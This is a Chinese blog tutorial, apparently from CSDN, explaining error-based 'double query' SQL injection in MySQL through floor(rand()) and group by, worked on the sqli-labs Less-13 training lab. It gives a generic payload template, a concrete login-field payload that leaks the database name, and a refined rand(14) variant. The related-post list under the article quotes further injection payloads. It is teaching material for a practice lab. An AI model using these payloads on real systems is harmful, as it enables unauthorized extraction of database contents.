sql注入中rand()和group by双注入报错(以sqli-labs_Less13为例)

2020-11-30 02:36:52 88 收藏
分类专栏: 网络安全 文章标签: mysql 安全
最后发布:2020-11-30 02:36:52首次发布:2020-11-30 02:36:52
版权声明:本文为博主原创文章,遵循<a href="http://creativecommons.org/licenses/by-sa/4.0/" target="_blank" rel="noopener"> CC 4.0 BY-SA </a>版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46145442/article/details/110361101
版权

文章目录

原理

原理是利用rand()*2重复计数和group by配合,导致临时表插入的主键重复以报错,不适用于表中只有2条数据以下的情况
标准payload:

//$$包含的是可变参数,[]内是可省略参数
$anything$ [前置参数闭合符号] [and|union] select count(*),concat(($payload$),floor(rand(0)*2)) as a from $table$ group by a [截断后置查询符号]

sqli-labs_Less13

只输入用户名admin时,POST数据为:

uname=admin&passwd=&submit=Submit

用户名处payload:

admin ') union select count(*),concat((database()),floor(rand(0)*2)) as a from information_schema.tables group by a %23

源代码是

SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1
  • 从源码看出子查询前是一个字符串不能返回两个列,也就是此处不能用and连接(要实现的话语句会很麻烦),用union查询比较合适

payload和过程分析

  • count(*)计数,concat的是group by的对象,按对象取数据计数时建一个两列的临时表,group by对象即为主键
  • group byrand()一起使用时,如果临时表中没有该主键,在插入前rand()会再计算一次

concat函数会拼合成security0或者security1,由于此处floor函数生成的前六个数是固定的011011,而在from表里取完数据并按group by的对象分组时,如果主键不存在临时表则会插入。

  1. 当从from表中取第一条记录的时候,此时group by的对象是concat函数聚合floor函数第一次计算值的security0,临时表中不存在此主键,将插入主键,但是注意,由于我们的语句是group by floor(rand(0)*2),所以插入的时候并不是直接插入security0,而是floor(rand(0)*2),正是在这时候floor(rand(0)*2)会再被计算一次,导致此时concat拼接出的是security1,其被插入临时表中作为主键,并count(*)计1
  2. 接着从from表取第二条记录,group by分组的对象是以concat聚合floor计算的第三个值security1,临时表中已存在此主键,所以只需将其count(*)+1
  3. 接着取from表第三条记录,group by的对象是第四次计算的security0,很明显,开始重复步骤1,至将主键security1插入临时表时,发现此主键已存在,于是报错主键重复,并在报错信息中抛出重复的主键,此主键即我们payload查询的记录
    以此达到双注入

优化payload

由注入过程可知,上面这种双注入的payload只适用于有三条记录及以上的表,倘若只有两条数据是不会报错的,但是同时从原理我们也可以考虑,是否可以利用从第二条记录开始就报错,恰好上述第二条记录其实对我们要的报错是没有任何作用的。
也就是说,如果rand()可以生成1010或者0101这样的数值,那么从取第二条记录开始就会报错,参考大佬的试验,给出优化的payload:

floor(rand(14)*2)
验证payload

floor(rand(0)*2)产生的前六个值011011

mysql> select floor(rand(0)*2) from users;
+------------------+
| floor(rand(0)*2) |
+------------------+
|                0 |
|                1 |
|                1 |
|                0 |
|                1 |
|                1 |
|                0 |
|                0 |
|                1 |
|                1 |
|                1 |
|                0 |
|                1 |
+------------------+
13 rows in set (0.00 sec)

floor(rand(14)*2)产生的前四个值1010

mysql> select floor(rand(14)*2) from users;
+-------------------+
| floor(rand(14)*2) |
+-------------------+
|                 1 |
|                 0 |
|                 1 |
|                 0 |
|                 0 |
|                 0 |
|                 1 |
|                 1 |
|                 1 |
|                 0 |
|                 0 |
|                 0 |
|                 1 |
+-------------------+
13 rows in set (0.00 sec)
  • floor(rand(14)*2)从表中取第一条数据时,向临时表插入原本不存在的主键key1,当取第二条数据时,由于此时主键key0不存在,将向临时表插入,且在插入前floor(rand(14)*2)会再计算一次,得到一个插入表中的主键key1,明显重复,故两条数据即报错。

bye

已标记关键词 清除标记
sqli-labs靶场实现(四)【GET型的报错注入(floor()、rand()、group by、count())】(less-5~6、具体步骤+图文详解)
weixin_46709219的博客
12-17 60
一)GET报错注入   1)报错注入介绍   2)GET单引号报错注入   3)GET双引号报错注入   4)sqlmap安全测试 二)补充知识 ———————————————————————————————————————————————————————— 一)GET报错注入 1)报错注入介绍 通过报错来显示出具体的信息,报错需要count(*),rand()、group by,三者缺一不可。其,对于报错注入几个常用函数进行讲解: rand()————随机函数,返回0~1之间的某个值,它看起
表情包
插入表情
还能输入1000个字符 “速评一下”
sqli-labs-less17
qq_45106794的博客
10-23 349
#sqli-labs-less17 在对uname这一项进行注入,发现不管是’ " ’ ) " )等,都显示一样,说明无法进行注入,也说明源代码可能有对uname进行检查,再试试passwd这一项 成功报错,说明passwd这一项可以进行注入 'or (select 1 from (select count(),concat(floor(rand(0)2),database())as x f...
sqli-labs攻关1(错误型注入、双查询注入)
qwzf
07-16 538
sqli-labs攻关(一) 前言 为了更好的学习和练习有关SQL注入的知识,于是我开启了sqli-labs的通关之路。。。。 为了方便学习查看,我在源码的$sql下一句语句写以下php语句(就是输出拿到数据库查询的完整语句是怎么样的) echo "你的 sql 语句是:".$sql."<br>"; 在开始注入之前,我学习了下面这些相关sql注入基础知识。 sql注入基础知识 ...
sqli-labs-less-38~53
giun的博客
02-16 165
less-38~45主要介绍堆叠注入的方法 less-46~53介绍order by 后的注入 less-38 查看源码,我们可以知道 $sql=&quot;SELECT * FROM users WHERE id='$id' LIMIT 0,1&quot;; 我们使用堆叠注入 http://127.0.0.1/sqli-labs-master/Less-38/?id=1';insert into users va...
mysql 随机RANDGROUP BY优化
php小松
07-23 1713
最近看到一篇文章关于mysql的优化的,其两个块内容平时用到的优化方法,记录和分享一下 group by 优化 SELECT goods_id,count(*) FROM t GROUP BY goods_id; 默认情况下,MySQL对所有GROUP BY col1,col2…的字段进行排序。如果查询包括GROUP BY,想要避免排序结果的消耗,则可以指定ORDER BY NULL禁止排序。
sql注入详解 一文了解sql注入所有常见方法
闵行小鱼塘
09-22 523
刷完了sqli-labs,对sql注入有了些许认识,在此做个小结与记录
通过sqli-labs学习sql注入——基础挑战之less1-10
giantbranch的专栏
05-02 5万+
欢迎光顾我的新博客:https://www.giantbranch.cn 本文链接:http://blog.csdn.net/u012763794/article/details/51207833 虽然sql注入接触过不少,其实也不太多,但是不系统,那就通过sqli-libs系统学习总结一下吧 注:第一个就说得详细一点,后面的有新知识才会说,所以第一个一定要看!!!如果第一个还有不明白的地方...
SQL注入报错注入函数
cyjmosthandsome的博客
02-26 2764
一、extractvalue() extractvalue(xml_frag,xpath_expr)函数接受两个参数,第一个为XML标记内容,也就是查询的内容,第二个为XPATH路径,也就是查询的路径。如果没有匹配内容,不管出于何种原因,只要xpath_expr有效,并且xml_frag由正确嵌套和关闭的元素组成 - 返回空字符串。不区分空元素的匹配和无匹配。但是如果X...
SQL注入:floor()报错注入
爱党人士
05-09 2592
基础知识: floor(): 去除小数部分 rand(): 产生随机数 rand(x): 每个x对应一个固定的值,但是如果连续执行多次值会变化,不过也是可预测的 floor报错payload: and select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables ...
sqli-labs-Less5 关于各种报错注入的学习
rfrder的博客
09-19 81
前言 做Less5之前自己还只是个只会简单的updatexml的小菜鸡。做题的时候查找了大量的资料,发现报错注入的各种姿势。感谢郁离歌大佬的博客,给了我很大的收获。这里贴下他的文章: SQLI-LABS修炼笔记(二) SQL注入报错注入的一些随笔 一些基本的函数 报错注入会遇到一些基本的函数,这里附上基本函数的总结: SQL注入的常见函数 知道了这些函数后,就可以开始各种报错注入姿势的学习了。 双查询注入 双查询注入的具体原理,可以参考下面的文章:在这里插入代码片 详细讲解双查询注入 或者 SQL注入
大数据的入门视频教程
07-26
大数据技术入门视频课程,会从基础思想和原理架构开始,全面介绍大数据的思想体系和架构,为学员进一步学习大数据奠定良好的基础。内容涉及大数据的核心问题、大数据核心思想,Google的三篇论文、GFS,Google的分布式文件系统,MapReduce,BigTable、Hadoop和Spark生态体系以及具体应用演示。
8小时Python零基础轻松入门
05-20
 
Java系列技术之JavaWeb入门
09-18
JavaWeb里的基础核心技术
编程四年,还是技不如人
编程菜鸟
01-17 1万+
劝告刚开始程序员生涯,或有意向的。程序员一定要不断学习,我就是典型的反面教材。现在社会内卷严重,招聘门槛只会越来越高。只有自身本领强,才不会被淘汰。的确很多面试的理论知识点,实际工作上可能不会遇到,就算是遇到了可以求助大佬,但要想要offer就必须跨过这坎。 下面说说我的案。16年大专计算机网络技术专业毕业。主攻网页制作和路由器交换机,成绩还算可以,还拿了国家励志奖学金。毕业后从事计算机行业的同学寥寥无几,而我就是其一个,编程的兴趣和成就感让我坚持了下来。(感觉学校...
某Java大佬在地表最强Java企业(阿里)面试总结
日常发呆
08-23 10万+
面试题真的是博大精深,也通过这个面试题学到了很多东西,很多笔者也不是很懂,如有描述错误的地方还望大佬赐教 HashMap和Hashtable的区别 Hashtable继承自Dictionary类,而HashMap继承自AbstractMap类。但二者都实现了Map接口。 Hashtable 的方法是Synchronize的,而HashMap的方法在缺省情况下是非Synchronize的。 HashMap把Hashtable的contains方法去掉了,改成containsValue和contains.
征服C++ 11视频精讲
09-02
【为什么还需要学习C++?】 你是否接触很多语言,但从来没有了解过编程语言的本质? 你是否想成为一名资深开发人员,想开发别人做不了的高性能程序? 你是否经常想要窥探大型企业级开发工程的思路,但苦于没有基础只能望洋兴叹?   那么C++就是你个人能力提升,职业之路进阶的不二之选。 【课程特色】 1.课程共19大章节,239课时内容,涵盖数据结构、函数、类、指针、标准库全部知识体系。 2.带你从知识与思想的层面从0构建C++知识框架,分析大型项目实践思路,为你打下坚实的基础。 3.李宁老师结合4大国外顶级C++著作的精华为大家推出的《征服C++11》课程。 【学完后我将达到什么水平?】 1.对C++的各个知识能够熟练配置、开发、部署; 2.吊打一切关于C++的笔试面试题; 3.面向物联网的“嵌入式”和面向大型化的“分布式”开发,掌握职业钥匙,把握行业先机。 【面向人群】 1.希望一站式快速入门的C++初学者; 2.希望快速学习 C++、掌握编程要义、修炼内功的开发者; 3.有志于挑战更高级的开发项目,成为资深开发的工程师。 【课程设计】 本课程包含3大模块 基础篇 本篇主要讲解c++的基础概念,包含数据类型、运算符等基本语法,数组、指针、字符串等基本词法,循环、函数、类等基本句法等。 进阶篇 本篇主要讲解编程常用的一些技能,包含类的高级技术、类的继承、编译链接和命名空间等。 提升篇: 本篇可以帮助学员更加高效的进行c++开发,其包含类型转换、文件操作、异常处理、代码重用等内容。
©️2020 CSDN 皮肤主题: 深蓝海洋 设计师:CSDN官方博客 返回首页